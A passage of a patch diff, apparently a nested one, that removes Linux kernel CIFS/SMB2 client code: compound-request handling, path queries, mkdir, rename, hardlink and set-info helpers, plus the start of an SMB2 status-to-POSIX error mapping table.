+-			    &rqst[num_rqst], &oplock, &vars->oparms,
+-			    utf16_path);
+-	kfree(utf16_path);
+-	if (rc)
+-		goto finished;
+-
+-	smb2_set_next_command(tcon, &rqst[num_rqst]);
+- after_open:
+-	num_rqst++;
+-	rc = 0;
+-
+-	/* Operation */
+-	switch (command) {
+-	case SMB2_OP_QUERY_INFO:
+-		rqst[num_rqst].rq_iov = &vars->qi_iov[0];
+-		rqst[num_rqst].rq_nvec = 1;
+-
+-		if (cfile)
+-			rc = SMB2_query_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				cfile->fid.persistent_fid,
+-				cfile->fid.volatile_fid,
+-				FILE_ALL_INFORMATION,
+-				SMB2_O_INFO_FILE, 0,
+-				sizeof(struct smb2_file_all_info) +
+-					  PATH_MAX * 2, 0, NULL);
+-		else {
+-			rc = SMB2_query_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				COMPOUND_FID,
+-				COMPOUND_FID,
+-				FILE_ALL_INFORMATION,
+-				SMB2_O_INFO_FILE, 0,
+-				sizeof(struct smb2_file_all_info) +
+-					  PATH_MAX * 2, 0, NULL);
+-			if (!rc) {
+-				smb2_set_next_command(tcon, &rqst[num_rqst]);
+-				smb2_set_related(&rqst[num_rqst]);
+-			}
+-		}
+-
+-		if (rc)
+-			goto finished;
+-		num_rqst++;
+-		trace_smb3_query_info_compound_enter(xid, ses->Suid, tcon->tid,
+-						     full_path);
+-		break;
+-	case SMB2_OP_POSIX_QUERY_INFO:
+-		rqst[num_rqst].rq_iov = &vars->qi_iov[0];
+-		rqst[num_rqst].rq_nvec = 1;
+-
+-		if (cfile)
+-			rc = SMB2_query_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				cfile->fid.persistent_fid,
+-				cfile->fid.volatile_fid,
+-				SMB_FIND_FILE_POSIX_INFO,
+-				SMB2_O_INFO_FILE, 0,
+-				/* TBD: fix following to allow for longer SIDs */
+-				sizeof(struct smb311_posix_qinfo *) + (PATH_MAX * 2) +
+-				(sizeof(struct cifs_sid) * 2), 0, NULL);
+-		else {
+-			rc = SMB2_query_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				COMPOUND_FID,
+-				COMPOUND_FID,
+-				SMB_FIND_FILE_POSIX_INFO,
+-				SMB2_O_INFO_FILE, 0,
+-				sizeof(struct smb311_posix_qinfo *) + (PATH_MAX * 2) +
+-				(sizeof(struct cifs_sid) * 2), 0, NULL);
+-			if (!rc) {
+-				smb2_set_next_command(tcon, &rqst[num_rqst]);
+-				smb2_set_related(&rqst[num_rqst]);
+-			}
+-		}
+-
+-		if (rc)
+-			goto finished;
+-		num_rqst++;
+-		trace_smb3_posix_query_info_compound_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_DELETE:
+-		trace_smb3_delete_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_MKDIR:
+-		/*
+-		 * Directories are created through parameters in the
+-		 * SMB2_open() call.
+-		 */
+-		trace_smb3_mkdir_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_RMDIR:
+-		rqst[num_rqst].rq_iov = &vars->si_iov[0];
+-		rqst[num_rqst].rq_nvec = 1;
+-
+-		size[0] = 1; /* sizeof __u8 See MS-FSCC section 2.4.11 */
+-		data[0] = &delete_pending[0];
+-
+-		rc = SMB2_set_info_init(tcon, server,
+-					&rqst[num_rqst], COMPOUND_FID,
+-					COMPOUND_FID, current->tgid,
+-					FILE_DISPOSITION_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
+-		if (rc)
+-			goto finished;
+-		smb2_set_next_command(tcon, &rqst[num_rqst]);
+-		smb2_set_related(&rqst[num_rqst++]);
+-		trace_smb3_rmdir_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_SET_EOF:
+-		rqst[num_rqst].rq_iov = &vars->si_iov[0];
+-		rqst[num_rqst].rq_nvec = 1;
+-
+-		size[0] = 8; /* sizeof __le64 */
+-		data[0] = ptr;
+-
+-		if (cfile) {
+-			rc = SMB2_set_info_init(tcon, server,
+-						&rqst[num_rqst],
+-						cfile->fid.persistent_fid,
+-						cfile->fid.volatile_fid,
+-						current->tgid,
+-						FILE_END_OF_FILE_INFORMATION,
+-						SMB2_O_INFO_FILE, 0,
+-						data, size);
+-		} else {
+-			rc = SMB2_set_info_init(tcon, server,
+-						&rqst[num_rqst],
+-						COMPOUND_FID,
+-						COMPOUND_FID,
+-						current->tgid,
+-						FILE_END_OF_FILE_INFORMATION,
+-						SMB2_O_INFO_FILE, 0,
+-						data, size);
+-			if (!rc) {
+-				smb2_set_next_command(tcon, &rqst[num_rqst]);
+-				smb2_set_related(&rqst[num_rqst]);
+-			}
+-		}
+-		if (rc)
+-			goto finished;
+-		num_rqst++;
+-		trace_smb3_set_eof_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_SET_INFO:
+-		rqst[num_rqst].rq_iov = &vars->si_iov[0];
+-		rqst[num_rqst].rq_nvec = 1;
+-
+-
+-		size[0] = sizeof(FILE_BASIC_INFO);
+-		data[0] = ptr;
+-
+-		if (cfile)
+-			rc = SMB2_set_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				cfile->fid.persistent_fid,
+-				cfile->fid.volatile_fid, current->tgid,
+-				FILE_BASIC_INFORMATION,
+-				SMB2_O_INFO_FILE, 0, data, size);
+-		else {
+-			rc = SMB2_set_info_init(tcon, server,
+-				&rqst[num_rqst],
+-				COMPOUND_FID,
+-				COMPOUND_FID, current->tgid,
+-				FILE_BASIC_INFORMATION,
+-				SMB2_O_INFO_FILE, 0, data, size);
+-			if (!rc) {
+-				smb2_set_next_command(tcon, &rqst[num_rqst]);
+-				smb2_set_related(&rqst[num_rqst]);
+-			}
+-		}
+-
+-		if (rc)
+-			goto finished;
+-		num_rqst++;
+-		trace_smb3_set_info_compound_enter(xid, ses->Suid, tcon->tid,
+-						   full_path);
+-		break;
+-	case SMB2_OP_RENAME:
+-		rqst[num_rqst].rq_iov = &vars->si_iov[0];
+-		rqst[num_rqst].rq_nvec = 2;
+-
+-		len = (2 * UniStrnlen((wchar_t *)ptr, PATH_MAX));
+-
+-		vars->rename_info.ReplaceIfExists = 1;
+-		vars->rename_info.RootDirectory = 0;
+-		vars->rename_info.FileNameLength = cpu_to_le32(len);
+-
+-		size[0] = sizeof(struct smb2_file_rename_info);
+-		data[0] = &vars->rename_info;
+-
+-		size[1] = len + 2 /* null */;
+-		data[1] = (__le16 *)ptr;
+-
+-		if (cfile)
+-			rc = SMB2_set_info_init(tcon, server,
+-						&rqst[num_rqst],
+-						cfile->fid.persistent_fid,
+-						cfile->fid.volatile_fid,
+-					current->tgid, FILE_RENAME_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
+-		else {
+-			rc = SMB2_set_info_init(tcon, server,
+-					&rqst[num_rqst],
+-					COMPOUND_FID, COMPOUND_FID,
+-					current->tgid, FILE_RENAME_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
+-			if (!rc) {
+-				smb2_set_next_command(tcon, &rqst[num_rqst]);
+-				smb2_set_related(&rqst[num_rqst]);
+-			}
+-		}
+-		if (rc)
+-			goto finished;
+-		num_rqst++;
+-		trace_smb3_rename_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	case SMB2_OP_HARDLINK:
+-		rqst[num_rqst].rq_iov = &vars->si_iov[0];
+-		rqst[num_rqst].rq_nvec = 2;
+-
+-		len = (2 * UniStrnlen((wchar_t *)ptr, PATH_MAX));
+-
+-		vars->link_info.ReplaceIfExists = 0;
+-		vars->link_info.RootDirectory = 0;
+-		vars->link_info.FileNameLength = cpu_to_le32(len);
+-
+-		size[0] = sizeof(struct smb2_file_link_info);
+-		data[0] = &vars->link_info;
+-
+-		size[1] = len + 2 /* null */;
+-		data[1] = (__le16 *)ptr;
+-
+-		rc = SMB2_set_info_init(tcon, server,
+-					&rqst[num_rqst], COMPOUND_FID,
+-					COMPOUND_FID, current->tgid,
+-					FILE_LINK_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
+-		if (rc)
+-			goto finished;
+-		smb2_set_next_command(tcon, &rqst[num_rqst]);
+-		smb2_set_related(&rqst[num_rqst++]);
+-		trace_smb3_hardlink_enter(xid, ses->Suid, tcon->tid, full_path);
+-		break;
+-	default:
+-		cifs_dbg(VFS, "Invalid command\n");
+-		rc = -EINVAL;
+-	}
+-	if (rc)
+-		goto finished;
+-
+-	/* We already have a handle so we can skip the close */
+-	if (cfile)
+-		goto after_close;
+-	/* Close */
+-	flags |= CIFS_CP_CREATE_CLOSE_OP;
+-	rqst[num_rqst].rq_iov = &vars->close_iov[0];
+-	rqst[num_rqst].rq_nvec = 1;
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[num_rqst], COMPOUND_FID,
+-			     COMPOUND_FID, false);
+-	smb2_set_related(&rqst[num_rqst]);
+-	if (rc)
+-		goto finished;
+- after_close:
+-	num_rqst++;
+-
+-	if (cfile) {
+-		rc = compound_send_recv(xid, ses, server,
+-					flags, num_rqst - 2,
+-					&rqst[1], &resp_buftype[1],
+-					&rsp_iov[1]);
+-	} else
+-		rc = compound_send_recv(xid, ses, server,
+-					flags, num_rqst,
+-					rqst, resp_buftype,
+-					rsp_iov);
+-
+- finished:
+-	if (cfile)
+-		cifsFileInfo_put(cfile);
+-
+-	SMB2_open_free(&rqst[0]);
+-	if (rc == -EREMCHG) {
+-		pr_warn_once("server share %s deleted\n", tcon->tree_name);
+-		tcon->need_reconnect = true;
+-	}
+-
+-	switch (command) {
+-	case SMB2_OP_QUERY_INFO:
+-		idata = ptr;
+-		if (rc == 0 && cfile && cfile->symlink_target) {
+-			idata->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
+-			if (!idata->symlink_target)
+-				rc = -ENOMEM;
+-		}
+-		if (rc == 0) {
+-			qi_rsp = (struct smb2_query_info_rsp *)
+-				rsp_iov[1].iov_base;
+-			rc = smb2_validate_and_copy_iov(
+-				le16_to_cpu(qi_rsp->OutputBufferOffset),
+-				le32_to_cpu(qi_rsp->OutputBufferLength),
+-				&rsp_iov[1], sizeof(idata->fi), (char *)&idata->fi);
+-		}
+-		if (rqst[1].rq_iov)
+-			SMB2_query_info_free(&rqst[1]);
+-		if (rqst[2].rq_iov)
+-			SMB2_close_free(&rqst[2]);
+-		if (rc)
+-			trace_smb3_query_info_compound_err(xid,  ses->Suid,
+-						tcon->tid, rc);
+-		else
+-			trace_smb3_query_info_compound_done(xid, ses->Suid,
+-						tcon->tid);
+-		break;
+-	case SMB2_OP_POSIX_QUERY_INFO:
+-		idata = ptr;
+-		if (rc == 0 && cfile && cfile->symlink_target) {
+-			idata->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
+-			if (!idata->symlink_target)
+-				rc = -ENOMEM;
+-		}
+-		if (rc == 0) {
+-			qi_rsp = (struct smb2_query_info_rsp *)
+-				rsp_iov[1].iov_base;
+-			rc = smb2_validate_and_copy_iov(
+-				le16_to_cpu(qi_rsp->OutputBufferOffset),
+-				le32_to_cpu(qi_rsp->OutputBufferLength),
+-				&rsp_iov[1], sizeof(idata->posix_fi) /* add SIDs */,
+-				(char *)&idata->posix_fi);
+-		}
+-		if (rqst[1].rq_iov)
+-			SMB2_query_info_free(&rqst[1]);
+-		if (rqst[2].rq_iov)
+-			SMB2_close_free(&rqst[2]);
+-		if (rc)
+-			trace_smb3_posix_query_info_compound_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_posix_query_info_compound_done(xid, ses->Suid, tcon->tid);
+-		break;
+-	case SMB2_OP_DELETE:
+-		if (rc)
+-			trace_smb3_delete_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_delete_done(xid, ses->Suid, tcon->tid);
+-		if (rqst[1].rq_iov)
+-			SMB2_close_free(&rqst[1]);
+-		break;
+-	case SMB2_OP_MKDIR:
+-		if (rc)
+-			trace_smb3_mkdir_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_mkdir_done(xid, ses->Suid, tcon->tid);
+-		if (rqst[1].rq_iov)
+-			SMB2_close_free(&rqst[1]);
+-		break;
+-	case SMB2_OP_HARDLINK:
+-		if (rc)
+-			trace_smb3_hardlink_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_hardlink_done(xid, ses->Suid, tcon->tid);
+-		free_set_inf_compound(rqst);
+-		break;
+-	case SMB2_OP_RENAME:
+-		if (rc)
+-			trace_smb3_rename_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_rename_done(xid, ses->Suid, tcon->tid);
+-		free_set_inf_compound(rqst);
+-		break;
+-	case SMB2_OP_RMDIR:
+-		if (rc)
+-			trace_smb3_rmdir_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_rmdir_done(xid, ses->Suid, tcon->tid);
+-		free_set_inf_compound(rqst);
+-		break;
+-	case SMB2_OP_SET_EOF:
+-		if (rc)
+-			trace_smb3_set_eof_err(xid,  ses->Suid, tcon->tid, rc);
+-		else
+-			trace_smb3_set_eof_done(xid, ses->Suid, tcon->tid);
+-		free_set_inf_compound(rqst);
+-		break;
+-	case SMB2_OP_SET_INFO:
+-		if (rc)
+-			trace_smb3_set_info_compound_err(xid,  ses->Suid,
+-						tcon->tid, rc);
+-		else
+-			trace_smb3_set_info_compound_done(xid, ses->Suid,
+-						tcon->tid);
+-		free_set_inf_compound(rqst);
+-		break;
+-	}
+-
+-	if (rc && err_iov && err_buftype) {
+-		memcpy(err_iov, rsp_iov, 3 * sizeof(*err_iov));
+-		memcpy(err_buftype, resp_buftype, 3 * sizeof(*err_buftype));
+-	} else {
+-		free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-		free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-		free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	}
+-	kfree(vars);
+-	return rc;
+-}
+-
+-int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+-			 struct cifs_sb_info *cifs_sb, const char *full_path,
+-			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
+-{
+-	__u32 create_options = 0;
+-	struct cifsFileInfo *cfile;
+-	struct cached_fid *cfid = NULL;
+-	struct kvec err_iov[3] = {};
+-	int err_buftype[3] = {};
+-	bool islink;
+-	int rc, rc2;
+-
+-	*adjust_tz = false;
+-	*reparse = false;
+-
+-	if (strcmp(full_path, ""))
+-		rc = -ENOENT;
+-	else
+-		rc = open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
+-	/* If it is a root and its handle is cached then use it */
+-	if (!rc) {
+-		if (cfid->file_all_info_is_valid) {
+-			memcpy(&data->fi, &cfid->file_all_info, sizeof(data->fi));
+-		} else {
+-			rc = SMB2_query_info(xid, tcon, cfid->fid.persistent_fid,
+-					     cfid->fid.volatile_fid, &data->fi);
+-		}
+-		close_cached_dir(cfid);
+-		return rc;
+-	}
+-
+-	cifs_get_readable_path(tcon, full_path, &cfile);
+-	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES, FILE_OPEN,
+-			      create_options, ACL_NO_MODE, data, SMB2_OP_QUERY_INFO, cfile,
+-			      err_iov, err_buftype);
+-	if (rc) {
+-		struct smb2_hdr *hdr = err_iov[0].iov_base;
+-
+-		if (unlikely(!hdr || err_buftype[0] == CIFS_NO_BUFFER))
+-			goto out;
+-		if (rc == -EOPNOTSUPP && hdr->Command == SMB2_CREATE &&
+-		    hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
+-			rc = smb2_parse_symlink_response(cifs_sb, err_iov,
+-							 &data->symlink_target);
+-			if (rc)
+-				goto out;
+-
+-			*reparse = true;
+-			create_options |= OPEN_REPARSE_POINT;
+-
+-			/* Failed on a symbolic link - query a reparse point info */
+-			cifs_get_readable_path(tcon, full_path, &cfile);
+-			rc = smb2_compound_op(xid, tcon, cifs_sb, full_path,
+-					      FILE_READ_ATTRIBUTES, FILE_OPEN,
+-					      create_options, ACL_NO_MODE, data,
+-					      SMB2_OP_QUERY_INFO, cfile, NULL, NULL);
+-			goto out;
+-		} else if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
+-			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
+-							     full_path, &islink);
+-			if (rc2) {
+-				rc = rc2;
+-				goto out;
+-			}
+-			if (islink)
+-				rc = -EREMOTE;
+-		}
+-		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+-		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+-			rc = -EOPNOTSUPP;
+-	}
+-
+-out:
+-	free_rsp_buf(err_buftype[0], err_iov[0].iov_base);
+-	free_rsp_buf(err_buftype[1], err_iov[1].iov_base);
+-	free_rsp_buf(err_buftype[2], err_iov[2].iov_base);
+-	return rc;
+-}
+-
+-
+-int smb311_posix_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+-				 struct cifs_sb_info *cifs_sb, const char *full_path,
+-				 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
+-{
+-	int rc;
+-	__u32 create_options = 0;
+-	struct cifsFileInfo *cfile;
+-	struct kvec err_iov[3] = {};
+-	int err_buftype[3] = {};
+-
+-	*adjust_tz = false;
+-	*reparse = false;
+-
+-	/*
+-	 * BB TODO: Add support for using the cached root handle.
+-	 * Create SMB2_query_posix_info worker function to do non-compounded query
+-	 * when we already have an open file handle for this. For now this is fast enough
+-	 * (always using the compounded version).
+-	 */
+-
+-	cifs_get_readable_path(tcon, full_path, &cfile);
+-	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES, FILE_OPEN,
+-			      create_options, ACL_NO_MODE, data, SMB2_OP_POSIX_QUERY_INFO, cfile,
+-			      err_iov, err_buftype);
+-	if (rc == -EOPNOTSUPP) {
+-		/* BB TODO: When support for special files added to Samba re-verify this path */
+-		if (err_iov[0].iov_base && err_buftype[0] != CIFS_NO_BUFFER &&
+-		    ((struct smb2_hdr *)err_iov[0].iov_base)->Command == SMB2_CREATE &&
+-		    ((struct smb2_hdr *)err_iov[0].iov_base)->Status == STATUS_STOPPED_ON_SYMLINK) {
+-			rc = smb2_parse_symlink_response(cifs_sb, err_iov, &data->symlink_target);
+-			if (rc)
+-				goto out;
+-		}
+-		*reparse = true;
+-		create_options |= OPEN_REPARSE_POINT;
+-
+-		/* Failed on a symbolic link - query a reparse point info */
+-		cifs_get_readable_path(tcon, full_path, &cfile);
+-		rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES,
+-				      FILE_OPEN, create_options, ACL_NO_MODE, data,
+-				      SMB2_OP_POSIX_QUERY_INFO, cfile, NULL, NULL);
+-	}
+-
+-out:
+-	free_rsp_buf(err_buftype[0], err_iov[0].iov_base);
+-	free_rsp_buf(err_buftype[1], err_iov[1].iov_base);
+-	free_rsp_buf(err_buftype[2], err_iov[2].iov_base);
+-	return rc;
+-}
+-
+-int
+-smb2_mkdir(const unsigned int xid, struct inode *parent_inode, umode_t mode,
+-	   struct cifs_tcon *tcon, const char *name,
+-	   struct cifs_sb_info *cifs_sb)
+-{
+-	return smb2_compound_op(xid, tcon, cifs_sb, name,
+-				FILE_WRITE_ATTRIBUTES, FILE_CREATE,
+-				CREATE_NOT_FILE, mode, NULL, SMB2_OP_MKDIR,
+-				NULL, NULL, NULL);
+-}
+-
+-void
+-smb2_mkdir_setinfo(struct inode *inode, const char *name,
+-		   struct cifs_sb_info *cifs_sb, struct cifs_tcon *tcon,
+-		   const unsigned int xid)
+-{
+-	FILE_BASIC_INFO data;
+-	struct cifsInodeInfo *cifs_i;
+-	struct cifsFileInfo *cfile;
+-	u32 dosattrs;
+-	int tmprc;
+-
+-	memset(&data, 0, sizeof(data));
+-	cifs_i = CIFS_I(inode);
+-	dosattrs = cifs_i->cifsAttrs | ATTR_READONLY;
+-	data.Attributes = cpu_to_le32(dosattrs);
+-	cifs_get_writable_path(tcon, name, FIND_WR_ANY, &cfile);
+-	tmprc = smb2_compound_op(xid, tcon, cifs_sb, name,
+-				 FILE_WRITE_ATTRIBUTES, FILE_CREATE,
+-				 CREATE_NOT_FILE, ACL_NO_MODE,
+-				 &data, SMB2_OP_SET_INFO, cfile, NULL, NULL);
+-	if (tmprc == 0)
+-		cifs_i->cifsAttrs = dosattrs;
+-}
+-
+-int
+-smb2_rmdir(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
+-	   struct cifs_sb_info *cifs_sb)
+-{
+-	drop_cached_dir_by_name(xid, tcon, name, cifs_sb);
+-	return smb2_compound_op(xid, tcon, cifs_sb, name, DELETE, FILE_OPEN,
+-				CREATE_NOT_FILE, ACL_NO_MODE,
+-				NULL, SMB2_OP_RMDIR, NULL, NULL, NULL);
+-}
+-
+-int
+-smb2_unlink(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
+-	    struct cifs_sb_info *cifs_sb)
+-{
+-	return smb2_compound_op(xid, tcon, cifs_sb, name, DELETE, FILE_OPEN,
+-				CREATE_DELETE_ON_CLOSE | OPEN_REPARSE_POINT,
+-				ACL_NO_MODE, NULL, SMB2_OP_DELETE, NULL, NULL, NULL);
+-}
+-
+-static int
+-smb2_set_path_attr(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const char *from_name, const char *to_name,
+-		   struct cifs_sb_info *cifs_sb, __u32 access, int command,
+-		   struct cifsFileInfo *cfile)
+-{
+-	__le16 *smb2_to_name = NULL;
+-	int rc;
+-
+-	smb2_to_name = cifs_convert_path_to_utf16(to_name, cifs_sb);
+-	if (smb2_to_name == NULL) {
+-		rc = -ENOMEM;
+-		goto smb2_rename_path;
+-	}
+-	rc = smb2_compound_op(xid, tcon, cifs_sb, from_name, access,
+-			      FILE_OPEN, 0, ACL_NO_MODE, smb2_to_name,
+-			      command, cfile, NULL, NULL);
+-smb2_rename_path:
+-	kfree(smb2_to_name);
+-	return rc;
+-}
+-
+-int
+-smb2_rename_path(const unsigned int xid, struct cifs_tcon *tcon,
+-		 const char *from_name, const char *to_name,
+-		 struct cifs_sb_info *cifs_sb)
+-{
+-	struct cifsFileInfo *cfile;
+-
+-	drop_cached_dir_by_name(xid, tcon, from_name, cifs_sb);
+-	cifs_get_writable_path(tcon, from_name, FIND_WR_WITH_DELETE, &cfile);
+-
+-	return smb2_set_path_attr(xid, tcon, from_name, to_name,
+-				  cifs_sb, DELETE, SMB2_OP_RENAME, cfile);
+-}
+-
+-int
+-smb2_create_hardlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const char *from_name, const char *to_name,
+-		     struct cifs_sb_info *cifs_sb)
+-{
+-	return smb2_set_path_attr(xid, tcon, from_name, to_name, cifs_sb,
+-				  FILE_READ_ATTRIBUTES, SMB2_OP_HARDLINK,
+-				  NULL);
+-}
+-
+-int
+-smb2_set_path_size(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const char *full_path, __u64 size,
+-		   struct cifs_sb_info *cifs_sb, bool set_alloc)
+-{
+-	__le64 eof = cpu_to_le64(size);
+-	struct cifsFileInfo *cfile;
+-
+-	cifs_get_writable_path(tcon, full_path, FIND_WR_ANY, &cfile);
+-	return smb2_compound_op(xid, tcon, cifs_sb, full_path,
+-				FILE_WRITE_DATA, FILE_OPEN, 0, ACL_NO_MODE,
+-				&eof, SMB2_OP_SET_EOF, cfile, NULL, NULL);
+-}
+-
+-int
+-smb2_set_file_info(struct inode *inode, const char *full_path,
+-		   FILE_BASIC_INFO *buf, const unsigned int xid)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct cifsFileInfo *cfile;
+-	int rc;
+-
+-	if ((buf->CreationTime == 0) && (buf->LastAccessTime == 0) &&
+-	    (buf->LastWriteTime == 0) && (buf->ChangeTime == 0) &&
+-	    (buf->Attributes == 0))
+-		return 0; /* would be a no op, no sense sending this */
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	cifs_get_writable_path(tcon, full_path, FIND_WR_ANY, &cfile);
+-	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path,
+-			      FILE_WRITE_ATTRIBUTES, FILE_OPEN,
+-			      0, ACL_NO_MODE, buf, SMB2_OP_SET_INFO, cfile,
+-			      NULL, NULL);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+diff --git a/fs/cifs/smb2maperror.c b/fs/cifs/smb2maperror.c
+deleted file mode 100644
+index 194799ddd3828..0000000000000
+--- a/fs/cifs/smb2maperror.c
++++ /dev/null
+@@ -1,2481 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Functions which do error mapping of SMB2 status codes to POSIX errors
+- *
+- *   Copyright (C) International Business Machines  Corp., 2009
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/errno.h>
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "smb2pdu.h"
+-#include "smb2proto.h"
+-#include "smb2status.h"
+-#include "smb2glob.h"
+-#include "trace.h"
+-
+-struct status_to_posix_error {
+-	__le32 smb2_status;
+-	int posix_error;
+-	char *status_string;
+-};
+-
+-static const struct status_to_posix_error smb2_error_map_table[] = {
+-	{STATUS_SUCCESS, 0, "STATUS_SUCCESS"},
+-	{STATUS_WAIT_0,  0, "STATUS_WAIT_0"},
+-	{STATUS_WAIT_1, -EIO, "STATUS_WAIT_1"},
+-	{STATUS_WAIT_2, -EIO, "STATUS_WAIT_2"},
+-	{STATUS_WAIT_3, -EIO, "STATUS_WAIT_3"},
+-	{STATUS_WAIT_63, -EIO, "STATUS_WAIT_63"},
+-	{STATUS_ABANDONED, -EIO, "STATUS_ABANDONED"},
+-	{STATUS_ABANDONED_WAIT_0, -EIO, "STATUS_ABANDONED_WAIT_0"},
+-	{STATUS_ABANDONED_WAIT_63, -EIO, "STATUS_ABANDONED_WAIT_63"},
+-	{STATUS_USER_APC, -EIO, "STATUS_USER_APC"},
+-	{STATUS_KERNEL_APC, -EIO, "STATUS_KERNEL_APC"},
+-	{STATUS_ALERTED, -EIO, "STATUS_ALERTED"},
+-	{STATUS_TIMEOUT, -ETIMEDOUT, "STATUS_TIMEOUT"},
+-	{STATUS_PENDING, -EIO, "STATUS_PENDING"},
+-	{STATUS_REPARSE, -EIO, "STATUS_REPARSE"},
+-	{STATUS_MORE_ENTRIES, -EIO, "STATUS_MORE_ENTRIES"},
+-	{STATUS_NOT_ALL_ASSIGNED, -EIO, "STATUS_NOT_ALL_ASSIGNED"},
+-	{STATUS_SOME_NOT_MAPPED, -EIO, "STATUS_SOME_NOT_MAPPED"},
+-	{STATUS_OPLOCK_BREAK_IN_PROGRESS, -EIO,
+-	"STATUS_OPLOCK_BREAK_IN_PROGRESS"},
+-	{STATUS_VOLUME_MOUNTED, -EIO, "STATUS_VOLUME_MOUNTED"},
+-	{STATUS_RXACT_COMMITTED, -EIO, "STATUS_RXACT_COMMITTED"},
+-	{STATUS_NOTIFY_CLEANUP, -EIO, "STATUS_NOTIFY_CLEANUP"},
+-	{STATUS_NOTIFY_ENUM_DIR, -EIO, "STATUS_NOTIFY_ENUM_DIR"},
+-	{STATUS_NO_QUOTAS_FOR_ACCOUNT, -EIO, "STATUS_NO_QUOTAS_FOR_ACCOUNT"},
+-	{STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED, -EIO,
+-	"STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED"},
+-	{STATUS_PAGE_FAULT_TRANSITION, -EIO, "STATUS_PAGE_FAULT_TRANSITION"},
+-	{STATUS_PAGE_FAULT_DEMAND_ZERO, -EIO, "STATUS_PAGE_FAULT_DEMAND_ZERO"},
+-	{STATUS_PAGE_FAULT_COPY_ON_WRITE, -EIO,
+-	"STATUS_PAGE_FAULT_COPY_ON_WRITE"},
+-	{STATUS_PAGE_FAULT_GUARD_PAGE, -EIO, "STATUS_PAGE_FAULT_GUARD_PAGE"},
+-	{STATUS_PAGE_FAULT_PAGING_FILE, -EIO, "STATUS_PAGE_FAULT_PAGING_FILE"},
+-	{STATUS_CACHE_PAGE_LOCKED, -EIO, "STATUS_CACHE_PAGE_LOCKED"},
+-	{STATUS_CRASH_DUMP, -EIO, "STATUS_CRASH_DUMP"},
+-	{STATUS_BUFFER_ALL_ZEROS, -EIO, "STATUS_BUFFER_ALL_ZEROS"},
+-	{STATUS_REPARSE_OBJECT, -EIO, "STATUS_REPARSE_OBJECT"},
+-	{STATUS_RESOURCE_REQUIREMENTS_CHANGED, -EIO,
+-	"STATUS_RESOURCE_REQUIREMENTS_CHANGED"},
+-	{STATUS_TRANSLATION_COMPLETE, -EIO, "STATUS_TRANSLATION_COMPLETE"},
+-	{STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY, -EIO,
+-	"STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY"},
+-	{STATUS_NOTHING_TO_TERMINATE, -EIO, "STATUS_NOTHING_TO_TERMINATE"},
+-	{STATUS_PROCESS_NOT_IN_JOB, -EIO, "STATUS_PROCESS_NOT_IN_JOB"},
+-	{STATUS_PROCESS_IN_JOB, -EIO, "STATUS_PROCESS_IN_JOB"},
+-	{STATUS_VOLSNAP_HIBERNATE_READY, -EIO,
+-	"STATUS_VOLSNAP_HIBERNATE_READY"},
